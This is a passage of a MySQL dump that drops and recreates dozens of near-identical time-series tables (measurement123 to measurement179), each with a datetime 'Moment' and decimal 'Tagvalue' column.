--
DROP TABLE IF EXISTS `measurement123`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement123` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement124`
--
DROP TABLE IF EXISTS `measurement124`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement124` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement125`
--
DROP TABLE IF EXISTS `measurement125`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement125` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement126`
--
DROP TABLE IF EXISTS `measurement126`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement126` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement127`
--
DROP TABLE IF EXISTS `measurement127`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement127` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement128`
--
DROP TABLE IF EXISTS `measurement128`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement128` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement129`
--
DROP TABLE IF EXISTS `measurement129`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement129` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement13`
--
DROP TABLE IF EXISTS `measurement13`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement13` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement130`
--
DROP TABLE IF EXISTS `measurement130`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement130` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement131`
--
DROP TABLE IF EXISTS `measurement131`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement131` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement132`
--
DROP TABLE IF EXISTS `measurement132`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement132` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement133`
--
DROP TABLE IF EXISTS `measurement133`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement133` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement134`
--
DROP TABLE IF EXISTS `measurement134`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement134` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement135`
--
DROP TABLE IF EXISTS `measurement135`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement135` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement136`
--
DROP TABLE IF EXISTS `measurement136`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement136` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement137`
--
DROP TABLE IF EXISTS `measurement137`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement137` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement138`
--
DROP TABLE IF EXISTS `measurement138`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement138` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement139`
--
DROP TABLE IF EXISTS `measurement139`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement139` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement14`
--
DROP TABLE IF EXISTS `measurement14`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement14` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement140`
--
DROP TABLE IF EXISTS `measurement140`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement140` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement141`
--
DROP TABLE IF EXISTS `measurement141`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement141` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement142`
--
DROP TABLE IF EXISTS `measurement142`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement142` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement143`
--
DROP TABLE IF EXISTS `measurement143`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement143` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement144`
--
DROP TABLE IF EXISTS `measurement144`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement144` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement145`
--
DROP TABLE IF EXISTS `measurement145`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement145` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement146`
--
DROP TABLE IF EXISTS `measurement146`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement146` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement147`
--
DROP TABLE IF EXISTS `measurement147`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement147` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement148`
--
DROP TABLE IF EXISTS `measurement148`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement148` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement149`
--
DROP TABLE IF EXISTS `measurement149`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement149` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement15`
--
DROP TABLE IF EXISTS `measurement15`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement15` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement150`
--
DROP TABLE IF EXISTS `measurement150`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement150` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement151`
--
DROP TABLE IF EXISTS `measurement151`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement151` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement152`
--
DROP TABLE IF EXISTS `measurement152`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement152` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement153`
--
DROP TABLE IF EXISTS `measurement153`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement153` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement154`
--
DROP TABLE IF EXISTS `measurement154`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement154` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement155`
--
DROP TABLE IF EXISTS `measurement155`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement155` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement156`
--
DROP TABLE IF EXISTS `measurement156`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement156` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement157`
--
DROP TABLE IF EXISTS `measurement157`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement157` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement158`
--
DROP TABLE IF EXISTS `measurement158`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement158` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement159`
--
DROP TABLE IF EXISTS `measurement159`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement159` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement16`
--
DROP TABLE IF EXISTS `measurement16`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement16` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement160`
--
DROP TABLE IF EXISTS `measurement160`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement160` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement161`
--
DROP TABLE IF EXISTS `measurement161`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement161` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement162`
--
DROP TABLE IF EXISTS `measurement162`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement162` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement163`
--
DROP TABLE IF EXISTS `measurement163`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement163` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement164`
--
DROP TABLE IF EXISTS `measurement164`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement164` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement165`
--
DROP TABLE IF EXISTS `measurement165`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement165` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement166`
--
DROP TABLE IF EXISTS `measurement166`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement166` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement167`
--
DROP TABLE IF EXISTS `measurement167`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement167` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement168`
--
DROP TABLE IF EXISTS `measurement168`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement168` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement169`
--
DROP TABLE IF EXISTS `measurement169`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement169` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement17`
--
DROP TABLE IF EXISTS `measurement17`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement17` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement170`
--
DROP TABLE IF EXISTS `measurement170`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement170` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement171`
--
DROP TABLE IF EXISTS `measurement171`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement171` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement172`
--
DROP TABLE IF EXISTS `measurement172`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement172` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement173`
--
DROP TABLE IF EXISTS `measurement173`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement173` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement174`
--
DROP TABLE IF EXISTS `measurement174`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement174` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement175`
--
DROP TABLE IF EXISTS `measurement175`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement175` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement176`
--
DROP TABLE IF EXISTS `measurement176`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement176` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement177`
--
DROP TABLE IF EXISTS `measurement177`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement177` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement178`
--
DROP TABLE IF EXISTS `measurement178`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement178` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement179`
--
DROP TABLE IF EXISTS `measurement179`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement179` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement18`
--
DROP TABLE IF EXISTS `measurement18`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement18` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement180`
--
DROP TABLE IF EXISTS `measurement180`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
